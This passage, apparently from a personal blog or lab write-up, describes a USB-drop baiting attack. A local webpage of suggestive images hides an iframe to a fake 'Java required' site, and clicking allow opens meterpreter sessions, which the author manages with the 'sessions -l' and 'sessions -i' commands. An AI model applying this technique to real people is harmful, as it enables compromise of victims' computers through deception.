I loaded the webpage with some generic, sexy pictures of women (I typed sexy pictures into google picture search-this was the best research ever!) to arise suspicion in the victim and put the in-line frame code to the malicious website at the bottom-this way there is content to fill the screen and more of a chance they won’t see or catch on to the fake java required frame at the bottom. So now the usb drive is ready to be “left” somewhere and when the victim clicks on the seemingly “local” webpage, it will load the inline frame to the fake java required website. The java security “run or cancel” prompt comes up numerous times (it’s actually kind of annoying) and in the scramble hopefully our victim will click allow, which will allow his box to be owned. Here is a screenshot showing the payload handler running (the payload was meterpreter) and I (victim) must have pressed allow because you can see a meterpreter session being opened near the bottom….


A few more sessions were opened, which I found by the command “sessions –l” (like list)

Using the command “sessions –i (as in interact) 1 (or the number session you want to interact with) I got a meterpreter prompt where I can use all the fun commands!